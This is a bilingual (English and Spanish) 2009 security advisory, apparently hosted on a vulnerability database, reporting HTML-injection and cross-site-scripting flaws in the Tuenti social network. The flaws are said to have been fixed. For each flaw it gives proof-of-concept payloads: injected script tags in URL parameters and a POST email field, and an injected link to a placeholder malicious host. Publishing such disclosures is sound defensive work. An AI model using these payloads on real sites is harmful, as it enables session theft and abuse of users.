`####################
Language: English
####################
------------------------------------------------------------
MULTIPLE CODE INJECTION VULNERABILITIES --TUENTI--SPAIN-->
------------------------------------------------------------
SYSTEM INFORMATION:
-->WEB: http://www.tuenti.com/
-->DOWNLOAD: No there.
-->DEMO: N/A
-->CATEGORY: Social Networking
-->DESCRIPTION: Tuenti is the biggest and most popular social network in Spain.
SYSTEM VULNERABILITY:
-->TESTED ON: firefox 3 and Internet Explorer 6.0
-->CATEGORY: HTML CODE INJECTION / XSS
-->Discovered Bug date: 2009-05-04
-->Reported Bug date: 2009-05-04
-->Fixed bug date: 2009-05-12
-->Author: YEnH4ckEr
-->mail: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: N/A
-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.
-->EXTRA-COMMENT: Xikitiya no me odies por esto jajaja
#################
/////////////////
HTML INJECTION:
/////////////////
#################
Go to --> http://www.tuenti.com/#m=video&video_id=697&cat_id=tuentiVideos
Vuln GET var --> 'cat_id'
Note: Here was not possible a XSS attack
------------------
PROOF OF CONCEPT:
------------------
http://www.tuenti.com/#m=video&video_id=697&cat_id=tuentiVideos"><A HREF=http://[MALICIOUS-HOST]/[PATH]/index.php>y3nh4ck3r was here!</A>
Return --> New link on footer
#############################
/////////////////////////////
CROSS SITE SCRIPTING (XSS):
/////////////////////////////
#############################
<<<<---------++++++++++++++ Condition: Be registered user +++++++++++++++++--------->>>>
<<<<---------++++++++++++++ Extra-Condition: Be friends (victim/attacker) +++++++++++++++++--------->>>>
Go to --> http://www.tuenti.com/#m=editfoto&upload=1&items=2-64699031-503405997-64699031
Vuln GET var --> 'items'
------------------
PROOF OF CONCEPT:
------------------
http://www.tuenti.com/#m=editfoto&upload=1&items=2-64699031-503405997-64699031"><script>alert('y3nh4ck3r was here')</script>
Return --> Alert message
<<<<---------++++++++++++++ Condition: Be registered user +++++++++++++++++--------->>>>
<<<<---------++++++++++++++ Extra-Condition: Nothing +++++++++++++++++--------->>>>
Go to --> http://www.tuenti.com/#m=videos&view=category&cat_id=upload
Vuln GET var --> 'cat_id'
------------------
PROOF OF CONCEPT:
------------------
http://www.tuenti.com/#m=videos&view=category&cat_id=upload"><script>alert(String.fromCharCode(121,51,110,104,52,99,107,51,114,32,119,97,115,32,104,101,114,101,33))</script>
Return --> Alert message
<<<<---------++++++++++++++ Condition: Nothing +++++++++++++++++--------->>>>
<<<<---------++++++++++++++ Extra-Condition: Nothing +++++++++++++++++--------->>>>
Go to --> http://www.tuenti.com/?need_invite=1
Vuln POST var --> 'email'
------------------
PROOF OF CONCEPT:
------------------
email="><script>alert(String.fromCharCode(121,51,110,104,52,99,107,51,114,32,119,97,115,32,104,101,114,101,33))</script>
Return --> Alert message
----------------
FINAL REMARK:
----------------
Staff's members have fixed successfully these vulnerabilites ;)
####################
Language: Spanish
####################
----------------------------------------------------------------------
MÚLTIPLES VULNERABILIDADES DE INYECCIÓN DE CÓDIGO --TUENTI--ESPAÑA->
----------------------------------------------------------------------
INFORMACIÓN DEL SISTEMA:
-->WEB: http://www.tuenti.com/
-->DESCARGA: No hay
-->DEMO: No disponible
-->CATEGORÍA: Red social
-->DESCRIPCIÓN: Tuenti es la mayor y más popular red social en España.
VULNERABILIDAD DEL SISTEMA:
-->PROBADO EN: firefox 3 y Internet Explorer 6.0
-->CATEGORÍA: INYECCIÓN DE CÓDIGO HTML/ XSS.
-->Fecha de descubrimiento del bug: 2009-05-04
-->Fecha de aviso al sistema: 2009-05-04
-->Fecha de fijación del bug: 2009-05-12
-->Autor: YEnH4ckEr
-->Correo: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: No disponible
-->Comentario: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.
-->Comentario-extra: Xikitiya no me odies por esto jajaja
#################
/////////////////
INYECCIÓN HTML:
/////////////////
#################
Ir a --> http://www.tuenti.com/#m=video&video_id=697&cat_id=tuentiVideos
Variable GET vulnerable --> 'cat_id'
Nota: Aquí no fue posible un ataque XSS
-------------------
PRUEBA DE CONCEPTO:
-------------------
http://www.tuenti.com/#m=video&video_id=697&cat_id=tuentiVideos"><A HREF=http://[MALICIOUS-HOST]/[PATH]/index.php>y3nh4ck3r was here!</A>
Devuelve --> Nuevo enlace en el pie de página
#############################
/////////////////////////////
CROSS SITE SCRIPTING (XSS):
/////////////////////////////
#############################
<<<<---------++++++++++++++ Condición: Ser usuario registrado +++++++++++++++++--------->>>>
<<<<---------++++++++++++++ Condición-extra: Ser amigos (víctima/atacante) +++++++++++++++++--------->>>>
Ir a --> http://www.tuenti.com/#m=editfoto&upload=1&items=2-64699031-503405997-64699031
Variable GET vulnerable --> 'items'
-------------------
PRUEBA DE CONCEPTO:
-------------------
http://www.tuenti.com/#m=editfoto&upload=1&items=2-64699031-503405997-64699031"><script>alert('y3nh4ck3r was here')</script>
Devuelve --> Mensaje de alerta
<<<<---------++++++++++++++ Condición: Ser usuario registrado +++++++++++++++++--------->>>>
<<<<---------++++++++++++++ Condición-extra: Nada +++++++++++++++++--------->>>>
Ir a --> http://www.tuenti.com/#m=videos&view=category&cat_id=upload
Variable GET vulnerable --> 'cat_id'
-------------------
PRUEBA DE CONCEPTO:
-------------------
http://www.tuenti.com/#m=videos&view=category&cat_id=upload"><script>alert(String.fromCharCode(121,51,110,104,52,99,107,51,114,32,119,97,115,32,104,101,114,101,33))</script>
Devuelve --> Mensaje de alerta
<<<<---------++++++++++++++ Condición: Nada +++++++++++++++++--------->>>>
<<<<---------++++++++++++++ Condición-extra: Nada +++++++++++++++++--------->>>>
Ir a --> http://www.tuenti.com/?need_invite=1
Variable POST vulnerable --> 'email'
-------------------
PRUEBA DE CONCEPTO:
-------------------
email="><script>alert(String.fromCharCode(121,51,110,104,52,99,107,51,114,32,119,97,115,32,104,101,114,101,33))</script>
Devuelve --> Mensaje de alerta
-------------------
OBSERVACIÓN FINAL:
-------------------
El equipo de trabajo ha fijado con éxito estas vulnerabilidades ;)
#######################################################################
#######################################################################
##*******************************************************************##
## SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray ... ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
## GREETZ TO: SPANISH H4ck3Rs community! ##
##*******************************************************************##
#######################################################################
#######################################################################
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation